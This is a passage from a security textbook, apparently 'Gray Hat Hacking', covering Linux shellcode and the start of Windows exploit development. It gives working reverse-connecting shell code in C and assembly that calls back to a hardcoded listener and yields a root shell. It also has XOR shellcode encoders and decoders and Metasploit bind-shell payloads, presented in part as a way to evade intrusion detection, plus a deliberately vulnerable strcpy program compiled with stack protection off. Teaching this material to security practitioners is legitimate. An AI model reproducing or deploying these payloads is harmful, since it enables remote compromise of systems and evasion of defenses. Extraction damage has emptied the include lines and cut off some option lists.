Sean Walton, Linux Socket Programming (Indianapolis: SAMS Publishing, 2001)
Implementing Reverse Connecting Shellcode
The last section was nice, but what if the vulnerable system sits behind a firewall and the
attacker cannot connect to the exploited system on a new port? As discussed in the previous
chapter, attackers will then use another technique: have the exploited system connect
back to the attacker on a particular IP and port. This is referred to as a reverse
connecting shell.
Reverse Connecting C Program
The good news is that we only need to change a few things from our previous port binding
code:
1. Replace bind, listen, and accept functions with a connect.
2. Add the destination address to the sockaddr structure.
3. Duplicate the stdin, stdout, and stderr to the open socket, not the client as
before.
Gray Hat Hacking: The Ethical Hacker’s Handbook
228
Chapter 10: Writing Linux Shellcode
229
PART III
Therefore, the reverse connecting code looks like:
$ cat reverse_connect.c
#include
#include
int main()
{
char * shell[2];
int soc,remote; //same declarations as last time
struct sockaddr_in serv_addr;
serv_addr.sin_family=2; // same setup of the sockaddr_in
serv_addr.sin_addr.s_addr=0x650A0A0A; //10.10.10.101
serv_addr.sin_port=0xBBBB; // port 48059
soc=socket(2,1,0);
remote = connect(soc, (struct sockaddr*)&serv_addr,0x10);
dup2(soc,0); //notice the change, we dup to the socket
dup2(soc,1); //notice the change, we dup to the socket
dup2(soc,2); //notice the change, we dup to the socket
shell[0]="/bin/sh"; //normal set up for execve
shell[1]=0;
execve(shell[0],shell,0); //boom!
}
CAUTION The previous code has hard-coded values in it.You may need to
change the IP given before compiling in order for this example to work on your
system. If you use an IP that has a 0 in an octet (for example, 127.0.0.1), the
resulting shellcode will contain a NULL byte and not work in an exploit.To create
the IP, simply convert each octet to hex and place them in reverse order (byte by byte).
Now that we have new C code, let’s test it by firing up a listener shell on our system at
IP 10.10.10.101:
$ nc -nlvv -p 48059
listening on [any] 48059 ...
The -nlvv flags prevent DNS resolution, set up a listener, and set netcat to very verbose
mode.
Now compile the new program and execute it:
# gcc -o reverse_connect reverse_connect.c
# ./reverse_connect
Onthe listener shell, you should see a connection. Go ahead and issue a test command:
connect to [10.10.10.101] from (UNKNOWN) [10.10.10.101] 38877
id;
uid=0(root) gid=0(root) groups=0(root)
It worked!
Gray Hat Hacking: The Ethical Hacker’s Handbook
230
Reverse Connecting Assembly Program
Again,we will simply modify our previous port_bind_asm.asm example to produce the
desired effect:
$ cat ./reverse_connect_asm.asm
BITS 32
section .text
global _start
_start:
xor eax,eax ;clear eax
xor ebx,ebx ;clear ebx
xor edx,edx ;clear edx
;socket(2,1,0)
push eax ; third arg to socket: 0
push byte 0x1 ; second arg to socket: 1
push byte 0x2 ; first arg to socket: 2
mov ecx,esp ; move the ptr to the args to ecx (2nd arg to socketcall)
inc bl ; set first arg to socketcall to # 1
mov al,102 ; call socketcall # 1: SYS_SOCKET
int 0x80 ; jump into kernel mode, execute the syscall
mov esi,eax ; store the return value (eax) into esi
;the next block replaces the bind, listen, and accept calls with connect
;client=connect(server,(struct sockaddr *)&serv_addr,0x10)
push edx ; still zero, used to terminate the next value pushed
push long 0x650A0A0A ; extra this time, push the address in reverse hex
push word 0xBBBB ; push the port onto the stack, 48059 in decimal
xor ecx, ecx ; clear ecx to hold the sa_family field of struck
mov cl,2 ; move single byte:2 to the low order byte of ecx
push word cx ; ; build struct, use port,sin.family:0002 four bytes
mov ecx,esp ; move addr struct (on stack) to ecx
push byte 0x10 ; begin the connect args, push 16 stack
push ecx ; save address of struct back on stack
push esi ; save server file descriptor (esi) to stack
mov ecx,esp ; store ptr to args to ecx (2nd arg of socketcall)
mov bl,3 ; set bl to # 3, first arg of socketcall
mov al,102 ; call socketcall # 3: SYS_CONNECT
int 0x80 ; jump into kernel mode, execute the syscall
; prepare for dup2 commands, need client file handle saved in ebx
mov ebx,esi ; copied soc file descriptor of client to ebx
;dup2(soc, 0)
xor ecx,ecx ; clear ecx
mov al,63 ; set first arg of syscall to 63: dup2
int 0x80 ; jump into
;dup2(soc, 1)
inc ecx ; increment ecx to 1
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into
Chapter 10: Writing Linux Shellcode
231
PART III
;dup2(soc, 2)
inc ecx ; increment ecx to 2
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into
;standard execve("/bin/sh"...
push edx
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al, 0x0b
int 0x80
As with the C program, this assembly program simply replaces the bind, listen, and
accept system calls with a connect system call instead. There are a few other things to
note. First, we have pushed the connecting address to the stack prior to the port. Next,
notice how the port has been pushed onto the stack, and then how a clever trick is used
to push the value 0x0002 onto the stack without using assembly instructions that will
yield NULL characters in the final hex opcodes. Finally, notice how the dup2 system
calls work on the socket itself, not the client handle as before.
Okay, let’s try it:
$ nc -nlvv -p 48059
listening on [any] 48059 ...
In another shell, assemble, link, and launch the binary:
$ nasm -f elf reverse_connect_asm.asm
$ ld -o port_connect reverse_connect_asm.o
$ ./reverse_connect_asm
Again, if everything worked well, you should see a connect in your listener shell.
Issue a test command:
connect to [10.10.10.101] from (UNKNOWN) [10.10.10.101] 38877
id;
uid=0(root) gid=0(root) groups=0(root)
It will be left as an exercise for the reader to extract the hex opcodes and test the resulting
shellcode.
References
Smashing the Stack…, Aleph One www.phrack.org/archives/49/P49-14
Smiler, Writing Shellcode http://community.corest.com/~juliano/art-shellcode.txt
Zillion www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html
Sean Walton, Linux Socket Programming (Indianapolis: SAMS Publishing, 2001)
Linux Reverse Shell www.packetstormsecurity.org/shellcode/connect-back.c
Gray Hat Hacking: The Ethical Hacker’s Handbook
232
Encoding Shellcode
Some of the many reasons to encode shellcode include
• Avoiding bad characters (\x00, \xa9, etc.)
• Avoiding detection of IDS or other network-based sensors
• Conforming to string filters, for example, tolower
In this section, we will cover encoding of shellcode to include examples.
Simple XOR Encoding
A simple parlor trick of computer science is the “exclusive or” (XOR) function. The XOR
function works like this:
0 XOR 0 = 0
0 XOR 1 = 1
1 XOR 0 = 1
1 XOR 1 = 0
The result of the XOR function (as its name implies) is true (Boolean 1) if and only if
one of the inputs is true. If both of the inputs are true, then the result is false. The XOR
function is interesting because it is reversible, meaning if you XOR a number (bitwise)
with another number twice, you get the original number back as a result. For example:
In binary, we can encode 5(101) with the key 4(100): 101 XOR 100 = 001
And to decode the number, we repeat with the same key(100): 001 XOR 100 = 101
In this case, we start with the number 5 in binary (101) and we XOR it with a key of 4
in binary (100). The result is the number 1 in binary (001). To get our original number
back, we can repeat the XOR operation with the same key (100).
The reversible characteristics of the XOR function make it a great candidate for encoding
and basic encryption. You simply encode a string at the bit level by performing the
XOR function with a key. Later you can decode it by performing the XOR function with
the same key.
Structure of Encoded Shellcode
When shellcode is encoded, a decoder needs to be placed on the front of the shellcode.
This decoder will execute first and decode the shellcode before passing execution to the
decoded shellcode. The structure of encoded shellcode looks like:
[decoder] [encoded shellcode]
NOTE It is important to realize that the decoder needs to adhere to the
same limitations you are trying to avoid by encoding the shellcode in the first
place. For example, if you are trying to avoid a bad character, say 0x00, then
the decoder cannot have that byte either.
JMP/CALL XOR Decoder Example
The decoder needs to know its own location so it can calculate the location of the
encoded shellcode and start decoding. There are many ways to determine the location of
the decoder, often referred to as GETPC. One of the most common GETPC techniques is
the JMP/CALL technique.We start with a JMP instruction forward to a CALL instruction,
which is located just before the start of the encoded shellcode. The CALL instruction will
push the address of the next address (the beginning of the encoded shellcode) onto the
stack and jump back to the next instruction (right after the original JMP). At that point,
we can pop the location of the encoded shellcode off the stack and store it in a register
for use when decoding. For example:
BT book # cat jmpcall.asm
[BITS 32]
global _start
_start:
jmp short call_point ; 1. JMP to CALL
begin:
pop esi ; 3. pop shellcode loc into esi for use in encoding
xor ecx,ecx ; 4. clear ecx
mov cl,0x0 ; 5. place holder (0x0) for size of shellcode
short_xor:
xor byte[esi],0x0 ; 6. XOR byte from esi with key (0x0=placeholder)
inc esi ; 7. increment esi pointer to next byte
loop short_xor ; 8. repeat to 6 until shellcode is decoded
jmp short shellcode ; 9. jump over call into decoded shellcode
call_point:
call begin ; 2. CALL back to begin, push shellcode loc on stack
shellcode: ; 10. decoded shellcode executes
; the decoded shellcode goes here.
You can see the JMP/CALL sequence in the preceding code. The location of the encoded
shellcode is popped off the stack and stored in esi. ecx is cleared and the size of
the shellcode is stored there. For now we use the placeholder of 0x00 for the size of our
shellcode. Later we will overwrite that value with our encoder. Next the shellcode is
decoded byte by byte. Notice the loop instruction will decrement ecx automatically on
each call to LOOP and ends automatically when ecx = 0x0. After the shellcode is
decoded, the program JMPs into the decoded shellcode.
Let’s assemble, link, and dump the binary OPCODE of the program.
BT book # nasm -f elf jmpcall.asm
BT book # ld -o jmpcall jmpcall.o
BT book # objdump -d ./jmpcall
./jmpcall: file format elf32-i386
Disassembly of section .text:
Chapter 10: Writing Linux Shellcode
233
PART III
Gray Hat Hacking: The Ethical Hacker’s Handbook
234
08048080 <_start>:
8048080: eb 0d jmp 804808f
08048082
8048082: 5e pop %esi
8048083: 31 c9 xor %ecx,%ecx
8048085: b1 00 mov $0x0,%cl
08048087
8048087: 80 36 00 xorb $0x0,(%esi)
804808a: 46 inc %esi
804808b: e2 fa loop 8048087
804808d: eb 05 jmp 8048094
0804808f
804808f: e8 ee ff ff ff call 8048082
BT book #
The binary representation (in hex) of our JMP/CALL decoder is
decoder[] =
"\xeb\x0d\x5e\x31\xc9\xb1\x00\x80\x36\x00\x46\xe2\xfa\xeb\x05"
"\xe8\xee\xff\xff\xff"
We will have to replace the NULL bytes just shown with the length of our shellcode and
the key to decode with, respectively.
FNSTENV XOR Example
Another popular GETPC technique is to use the FNSTENV assembly instruction as
described by Noir. The FNSTENV instruction writes a 32-byte Floating Point Unit (FPU)
environment record to the memory address specified by the operand.
The FPU environment record is a structure defined as user_fpregs_struct in /usr/
include/sys/user.h and contains the members (at offsets):
• 0 Control word
• 4 Status word
• 8 Tag word
• 12 Last FPU Instruction Pointer
• Other fields
As you can see, the 12th byte of the FPU environment record contains the Extended
Instruction Pointer (EIP) of the last FPU instruction called. So, in the following example,
we will first call an innocuous FPU instruction (FABS), and then call the FNSTENV
command to extract the EIP of the FABS command.
Since the eip is located 12 bytes inside the returned FPU record, we will write the
record 12 bytes before the top of the stack (ESP-0x12), which will place the eip value at
Chapter 10: Writing Linux Shellcode
235
PART III
the top of our stack. Then we will pop the value off the stack into a register for use during
decoding.
BT book # cat ./fnstenv.asm
[BITS 32]
global _start
_start:
fabs ;1. innocuous FPU instruction
fnstenv [esp-0xc] ;2. dump FPU environ. record at ESP-12
pop edx ;3. pop eip of fabs FPU instruction to edx
add dl, 00 ;4. offset from fabs -> xor buffer
(placeholder)
short_xor_beg:
xor ecx,ecx ;5. clear ecx to use for loop
mov cl, 0x18 ;6. size of xor'd payload
short_xor_xor:
xor byte [edx], 0x00 ;7. the byte to xor with (key placeholder)
inc edx ;8. increment EDX to next byte
loop short_xor_xor ;9. loop through all of shellcode
shellcode:
; the decoded shellcode goes here.
Once we obtain the location of FABS (line 3 preceding), we have to adjust it to point to
the beginning of the decoded shellcode. Now let’s assemble, link, and dump the
opcodes of the decoder.
BT book # nasm -f elf fnstenv.asm
BT book # ld -o fnstenv fnstenv.o
BT book # objdump -d ./fnstenv
./fnstenv2: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: d9 e1 fabs
8048082: d9 74 24 f4 fnstenv 0xfffffff4(%esp)
8048086: 5a pop %edx
8048087: 80 c2 00 add $0x0,%dl
0804808a
804808a: 31 c9 xor %ecx,%ecx
804808c: b1 18 mov $0x18,%cl
0804808e
804808e: 80 32 00 xorb $0x0,(%edx)
8048091: 42 inc %edx
8048092: e2 fa loop 804808e
BT book #
Our FNSTENV decoder can be represented in binary as follows:
char decoder[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x00\x31"
"\xc9\xb1\x18\x80\x32\x00\x42\xe2\xfa";
Putting It All Together
We will now put it together and build a FNSTENV encoder and decoder test program.
BT book # cat encoder.c
#include
#include
#include
int getnumber(int quo) { //random number generator function
int seed;
struct timeval tm;
gettimeofday( &tm, NULL );
seed = tm.tv_sec + tm.tv_usec;
srandom( seed );
return (random() % quo);
}
void execute(char *data){ //test function to execute encoded shellcode
printf("Executing...\n");
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)data;
}
void print_code(char *data) { //prints out the shellcode
int i,l = 15;
for (i = 0; i < strlen(data); ++i) {
if (l >= 15) {
if (i)
printf("\"\n");
printf("\t\"");
l = 0;
}
++l;
printf("\\x%02x", ((unsigned char *)data)[i]);
}
printf("\";\n\n");
}
int main() { //main function
char shellcode[] = //original shellcode
"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int count;
int number = getnumber(200); //random number generator
int badchar = 0; //used as flag to check for bad chars
int ldecoder; //length of decoder
int lshellcode = strlen(shellcode); //store length of shellcode
char *result;
Gray Hat Hacking: The Ethical Hacker’s Handbook
236
PART III
//simple fnstenv xor decoder, NULL are overwritten with length and key.
char decoder[] = "\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x00\x31"
"\xc9\xb1\x18\x80\x32\x00\x42\xe2\xfa";
printf("Using the key: %d to xor encode the shellcode\n",number);
decoder[9] += 0x14; //length of decoder
decoder[16] += number; //key to encode with
ldecoder = strlen(decoder); //calculate length of decoder
printf("\nchar original_shellcode[] =\n");
print_code(shellcode);
do { //encode the shellcode
if(badchar == 1) { //if bad char, regenerate key
number = getnumber(10);
decoder[16] += number;
badchar = 0;
}
for(count=0; count < lshellcode; count++) { //loop through shellcode
shellcode[count] = shellcode[count] ^ number; //xor encode byte
if(shellcode[count] == '\0') { // other bad chars can be listed here
badchar = 1; //set bad char flag, will trigger redo
}
}
} while(badchar == 1); //repeat if badchar was found
result = malloc(lshellcode + ldecoder);
strcpy(result,decoder); //place decoder in front of buffer
strcat(result,shellcode); //place encoded shellcode behind decoder
printf("\nchar encoded[] =\n"); //print label
print_code(result); //print encoded shellcode
execute(result); //execute the encoded shellcode
}
BT book #
Now compile it and launch it three times.
BT book # gcc -o encoder encoder.c
BT book # ./encoder
Using the key: 149 to xor encode the shellcode
char original_shellcode[] =
"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
char encoded[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x14\x31\xc9\xb1\x18\x80"
"\x32\x95\x42\xe2\xfa\xa4\x55\x0c\xc7\xfd\xba\xba\xe6\xfd\xfd"
"\xba\xf7\xfc\xfb\x1c\x76\xc5\xc6\x1c\x74\x25\x9e\x58\x15";
Executing...
sh-3.1# exit
exit
BT book # ./encoder
Using the key: 104 to xor encode the shellcode
Chapter 10: Writing Linux Shellcode
237
Gray Hat Hacking: The Ethical Hacker’s Handbook
238
char original_shellcode[] =
"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
char encoded[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x14\x31\xc9\xb1\x18\x80"
"\x32\x6f\x42\xe2\xfa\x5e\xaf\xf6\x3d\x07\x40\x40\x1c\x07\x07"
"\x40\x0d\x06\x01\xe6\x8c\x3f\x3c\xe6\x8e\xdf\x64\xa2\xef";
Executing...
sh-3.1# exit
exit
BT book # ./encoder
Using the key: 96 to xor encode the shellcode
char original_shellcode[] =
"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
char encoded[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x14\x31\xc9\xb1\x18\x80"
"\x32\x60\x42\xe2\xfa\x51\xa0\xf9\x32\x08\x4f\x4f\x13\x08\x08"
"\x4f\x02\x09\x0e\xe9\x83\x30\x33\xe9\x81\xd0\x6b\xad\xe0";
Executing...
sh-3.1# exit
exit
BT book #
As you can see, the original shellcode is encoded and appended to the decoder. The
decoder is overwritten at runtime to replace the NULL bytes with length and key respectively.
As expected, each time the program is executed, a new set of encoded shellcode is
generated. However, most of the decoder remains the same.
There are ways to add some entropy to the decoder. Portions of the decoder may be
done in multiple ways. For example, instead of using the add instruction, we could have
used the sub instruction. Likewise, we could have used any number of FPU instructions
instead of FABS. So, we can break down the decoder into smaller interchangeable parts
and randomly piece them together to accomplish the same task and obtain some level
of change on each execution.
Automating Shellcode Generation
with Metasploit
Nowthat you have learned “long division,” let’s showyou howto use the “calculator.” The
Metasploit package comes with tools to assist in shellcode generation and encoding.
Generating Shellcode with Metasploit
The msfpayload command is supplied with Metasploit and automates the generation of
shellcode.
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload
Usage: ./msfpayload
Payloads:
bsd_ia32_bind BSD IA32 Bind Shell
bsd_ia32_bind_stg BSD IA32 Staged Bind Shell
bsd_ia32_exec BSD IA32 Execute Command
… truncated for brevity
linux_ia32_bind Linux IA32 Bind Shell
linux_ia32_bind_stg Linux IA32 Staged Bind Shell
linux_ia32_exec Linux IA32 Execute Command
… truncated for brevity
win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
… truncated for brevity
Notice the possible output formats:
• S Summary to include options of payload
• C C language format
• P Perl format
• R Raw format, nice for passing into msfencode and other tools
• X Export to executable format (Windows only)
We will choose the linux_ia32_bind payload. To check options, simply supply the type.
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload linux_ia32_bind
Name: Linux IA32 Bind Shell
Version: $Revision: 1638 $
OS/CPU: linux/x86
Needs Admin: No
Multistage: No
Total Size: 84
Keys: bind
Provided By:
skape
vlad902
Available Options:
Options: Name Default Description
-------- ------ ------- -----------------------------
required LPORT 4444 Listening port for bind shell
Advanced Options:
Advanced (Msf::Payload::linux_ia32_bind):
-----------------------------------------
Description:
Listen for connection and spawn a shell
Just to showhow,we will change the local port to 3333 and use the C output format.
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload linux_ia32_bind LPORT=3333 C
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
Chapter 10: Writing Linux Shellcode
239
PART III
Gray Hat Hacking: The Ethical Hacker’s Handbook
240
"\x43\x52\x66\x68\x0d\x05\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
Wow, that was easy!
Encoding Shellcode with Metasploit
The msfencode tool is provided by Metasploit and will encode your payload (in raw
format).
$ ./msfencode -h
Usage: ./msfencode
Options:
-i
-a
-o
-t
-b
-s
-e
-n
-l List all available encoders
Now we can pipe our msfpayload output in (Raw format) into the msfencode tool, provide
a list of bad characters, and check for available encoders (-l option).
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload linux_ia32_bind LPORT=3333 R | ./msfencode -b '\x00' -l
Encoder Name Arch Description
============================================================================
…truncated for brevity
JmpCallAdditive x86 Jmp/Call XOR Additive Feedback Decoder
…
PexAlphaNum x86 Skylined's alphanumeric encoder ported to perl
PexFnstenvMov x86 Variable-length fnstenv/mov dword xor encoder
PexFnstenvSub x86 Variable-length fnstenv/sub dword xor encoder
…
ShikataGaNai x86 You know what I'm saying, baby
…
We will select the PexFnstenvMov encoder, as we are most familiar with that.
allen@IBM-4B5E8287D50 ~/framework
$ ./msfpayload linux_ia32_bind LPORT=3333 R | ./msfencode -b '\x00' -e
PexFnste nvMov -t c
[*] Using Msf::Encoder::PexFnstenvMov with final size of 106 bytes
"\x6a\x15\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbb\xf0\x41"
"\x88\x83\xeb\xfc\xe2\xf4\x8a\x2b\x12\xcb\xe8\x9a\x43\xe2\xdd\xa8"
"\xd8\x01\x5a\x3d\xc1\x1e\xf8\xa2\x27\xe0\xb6\xf5\x27\xdb\x32\x11"
"\x2b\xee\xe3\xa0\x10\xde\x32\x11\x8c\x08\x0b\x96\x90\x6b\x76\x70"
"\x13\xda\xed\xb3\xc8\x69\x0b\x96\x8c\x08\x28\x9a\x43\xd1\x0b\xcf"
"\x8c\x08\xf2\x89\xb8\x38\xb0\xa2\x29\xa7\x94\x83\x29\xe0\x94\x92"
"\x28\xe6\x32\x13\x13\xdb\x32\x11\x8c\x08";
As you can see, that is much easier than building your own. There is also a web interface
to the msfpayload and msfencode tools. We will leave that for other chapters.
References
Noir use of FNSTENV www.securityfocus.com/archive/82/327100/30/0/threaded
JMP/CALL and FNSTENV decoders www.klake.org/~jt/encoder/#decoders
Good brief on shellcode and encoders www.secdev.org/conf/shellcodes_syscan04.pdf
Metasploit www.metasploit.com/confs/recon2005/recent_shellcode_developmentsrecon05.
pdf
Chapter 10: Writing Linux Shellcode
241
PART III
This page intentionally left blank
243
CHAPTER11 Basic Windows Exploits
In this chapter,we will show how to build basic Windows exploits.
• Compiling Windows programs
• Linking with debugging information
• Debugging Windows programs with Windows console debuggers
• Using symbols
• Disassembling Windows programs
• Debugging Windows programs with OllyDbg
• Building your first Windows exploit of meet.exe
• Real-world Windows exploit example
Up to this point in the book, we’ve been using Linux as our platform of choice because
it’s easy for most people interested in hacking to get hold of a Linux machine for experimentation.
Many of the interesting bugs you’ll want to exploit, however, are on the
more-often-used Windows platform. Luckily, the same bugs can be exploited largely the
same way on both Linux and Windows, because they are both driven by the same assembly
language underneath the hood. So in this chapter, we’ll talk about where to get the
tools to build Windows exploits, showyou howto use those tools, and recycle one of the
Linux examples from Chapter 6 by creating the same exploit on Windows.
Compiling and Debugging Windows Programs
Development tools are not included with Windows, but that doesn’t mean you need to
spend $1,000 for Visual Studio to experiment with exploit writing. (If you have it
already, great—feel free to use it for this chapter.) You can download for free the same
compiler and debugger Microsoft bundles with Visual Studio .NET 2003 Professional.
In this section,we’ll showyou howto initially set up your Windows exploitworkstation.
Compiling on Windows
The Microsoft C/C Optimizing Compiler and Linker are available for free from http://
msdn.microsoft.com/vstudio/express/visualc/default.aspx. After a 32MB download and a
straightforward install, you’ll have a Start menu link to the Visual C++ 2005 Express Edition.
Click the shortcut to launch a command prompt with its environment configured for
Gray Hat Hacking: The Ethical Hacker’s Handbook
244
compiling code. To test it out, let’s start with the meet.c examplewe introduced in Chapter 6
and then exploited in Linux in Chapter 7. Type in the example or copy it from the Linux
machine you built it on earlier.
C:\grayhat>type hello.c
//hello.c
#include
main ( ) {
printf("Hello haxor");
}
The Windows compiler is cl.exe. Passing the compiler the name of the source file will
generate hello.exe. (Remember from Chapter 6 that compiling is simply the process of
turning human-readable source code into machine-readable binary files that can be
digested by the computer and executed.)
C:\grayhat>cl hello.c
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 14.00.50727.42 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
hello.c
Microsoft (R) Incremental Linker Version 8.00.50727.42
Copyright (C) Microsoft Corporation. All rights reserved.
/out:hello.exe
hello.obj
C:\grayhat>hello.exe
Hello haxor
Pretty simple, eh? Let’s move on to build the program we’ll be exploiting later in the
chapter. Create meet.c from Chapter 6 and compile it using cl.exe.
C:\grayhat>type meet.c
//meet.c
#include
greeting(char *temp1, char *temp2) {
char name[400];
strcpy(name, temp2);
printf("Hello %s %s\n", temp1, name);
}
main(int argc, char *argv[]){
greeting(argv[1], argv[2]);
printf("Bye %s %s\n", argv[1], argv[2]);
}
C:\grayhat>cl meet.c
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 14.00.50727.42 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
meet.c
Microsoft (R) Incremental Linker Version 8.00.50727.42
Copyright (C) Microsoft Corporation. All rights reserved.
/out:meet.exe
meet.obj
C:\grayhat>meet.exe Mr. Haxor
Hello Mr. Haxor
Bye Mr. Haxor
Chapter 11: Basic Windows Exploits
245
PART III
Windows Compiler Options
If you type in cl.exe /?, you’ll get a huge list of compiler options. Most are not interesting
to us at this point. The following table gives the flags you’ll be using in this chapter.
Option Description
/Zi Produces extra debugging information, useful when using the Windows debugger
that we’ll demonstrate later.
/Fe Similar to gcc’s -o option. The Windows compiler by default names the executable
the same as the source with .exe appended. If you want to name it something
different, specify this flag followed by the EXE name you’d like.
/GS[-] The /GS flag is on by default in Microsoft Visual Studio 2005 and provides stack
canary protection. To disable it for testing, use the /GS- flag.
Because we’re going to be using the debugger next, let’s build meet.exe with full
debugging information and disable the stack canary functions.
NOTE The /GS switch enables Microsoft’s implementation of stack canary
protection, which is quite effective in stopping buffer overflow attacks. To
learn about existing vulnerabilities in software (before this feature was
available),we will disable it with the /GS- flag.
C:\grayhat>cl /Zi /GS- meet.c
…output truncated for brevity…
C:\grayhat>meet Mr Haxor
Hello Mr Haxor
Bye Mr Haxor
Great, now that you have an executable built with debugging information, it’s time to
install the debugger and see how debugging on Windows compares with the Unix
debugging experience.
NOTE If you use the same compiler flags all the time, you may set the
command-line arguments in the environment with a set command as follows:
C:\grayhat>set CL=/Zi /GSDebugging
on Windows with Windows Console Debuggers
In addition to the free compiler, Microsoft also gives away their debugger. You can download
it from www.microsoft.com/whdc/devtools/debugging/installx86.mspx. This is a
10MB download that installs the debugger and several helpful debugging utilities.
When the debugger installation wizard prompts you for the location where you’d like
the debugger installed, choose a short directory name at the root of your drive.
Gray Hat Hacking: The Ethical Hacker’s Handbook
246
The examples in this chapter will assume your debugger is installed in c:\debuggers
(much easier to type than C:\Program Files\Debugging Tools for Windows).
C:\debuggers>dir *.exe
Volume in drive C is LOCAL DISK
Volume Serial Number is C819-53ED
Directory of C:\debuggers
05/18/2004 12:22 PM 5,632 breakin.exe
05/18/2004 12:22 PM 53,760 cdb.exe
05/18/2004 12:22 PM 64,000 dbengprx.exe
04/16/2004 06:18 PM 68,096 dbgrpc.exe
05/18/2004 12:22 PM 13,312 dbgsrv.exe
05/18/2004 12:23 PM 6,656 dumpchk.exe
…output truncated for brevity…
CDB vs. NTSD vs. WinDbg
There are actually three debuggers in the preceding list of programs. CDB (Microsoft
Console Debugger) and NTSD (Microsoft NT Symbolic Debugger) are both characterbased
console debuggers that act the sameway and respond to the same commands. The
single difference is that NTSD launches a new text window when it starts, whereas CDB
inherits the command window from which it was invoked. If anyone tells you there are
other differences between the two console debuggers, they have almost certainly been
using old versions of one or the other.
The third debugger is WinDbg, a Windows debugger with a full GUI. If you are more
comfortable using GUI applications than console-based applications, you might prefer
to use WinDbg. It, again, responds to the same commands and works the same way
under the GUI as CDB and NTSD. The advantage of using WinDbg (or any other graphical
debugger) is that you can open multiple windows, each containing different data to
monitor during your program’s execution. For example, you can open one window with
your source code, a second with the accompanying assembly instructions, and a third
with your list of breakpoints.
NOTE An older version of ntsd.exe is included with Windows in the
system32 directory. Either add to your path the directory where you installed
the new debugger earlier than your Windows system32 directory, or use the
full path when launching NTSD.
Windows Debugger Commands
If you’re already familiar with debugging, the Windows debugger will be a snap to pick
up. Here’s a table of frequently used debugger commands, specifically geared to leverage
the gdb experience you’ve gotten in this book.
Command gdb Equiv Description
bp b *mem Sets a breakpoint at a specific memory address.
bp
bm
b
use with wildcards (as shown later).
bl info b Lists information about existing breakpoints.
PART III
Chapter 11: Basic Windows Exploits
247
bc
g Run Go/continue.
r info reg Displays (or modifies) register contents.
p next or n Step over, executes an entire function or single instruction
or source line.
t step or s Step into or execute a single instruction.
k (kb / kP ) bt Displays stack backtrace, optionally also
function args.
.frame <#> up/down Changes the stack context used to interpret commands
and local variables. “Move to a different stack frame.”
dd
(da / db / du)
x /NT A Displays memory. dd = dword values, da = ASCII
characters, db = byte values and ASCII, du = Unicode.
dt
dv /V p Displays local variables (specific to current context).
uf
u
disassemble
Displays the assembly translation of a function or the
assembly at a specific address.
q quit Exit debugger.
Those commands are enough to get started. You can learn more about the debugger
in the debugger.chm HTML help file found in your debugger installation directory. (Use
hh debugger.chm to open it.) The command reference specifically is under Debugger
Reference | Debugger Commands | Commands.
Symbols and the Symbol Server
The final thing you need to understand before we start debugging is the purpose of symbols.
Symbols connect function names and arguments to offsets in a compiled executable
or DLL. You can debug without symbols, but it is a huge pain. Thankfully, Microsoft
provides symbols for their released operating systems. You can download all symbols
for your particular OS, but that would require a huge amount of local disk space. A
better way to acquire symbols is to use Microsoft’s symbol server and to fetch symbols as
you need them. Windows debuggers make this easy to do by providing symsrv.dll,
which you can use to set up a local cache of symbols and specify the location to get new
symbols as you need them. This is done through the environment variable _NT_
SYMBOL_PATH. You’ll need to set this environment variable so the debugger knows
where to look for symbols. If you already have all the symbols you need locally, you can
simply set the variable to that directory like this:
C:\grayhat>set _NT_SYMBOL _PATH=c:\symbols
If you (more likely) would like to use the symbol server, the syntax is as follows:
C:\grayhat>set _NT_SYMBOL _PATH=symsrv*symsrv.dll*c:\symbols*http://msdl.
microsoft.com/download/symbols
Using the preceding syntax, the debugger will first look in c:\symbols for the symbols
it needs. If it can’t find them there, it will download them from Microsoft’s public
Gray Hat Hacking: The Ethical Hacker’s Handbook
248
symbols server. After it downloads them, it will place the downloaded symbols in c:\symbols,
expecting the directory to exist, so they’ll be available locally the next time they’re
needed. Setting up the symbol path to use the symbols server is a common setup, and
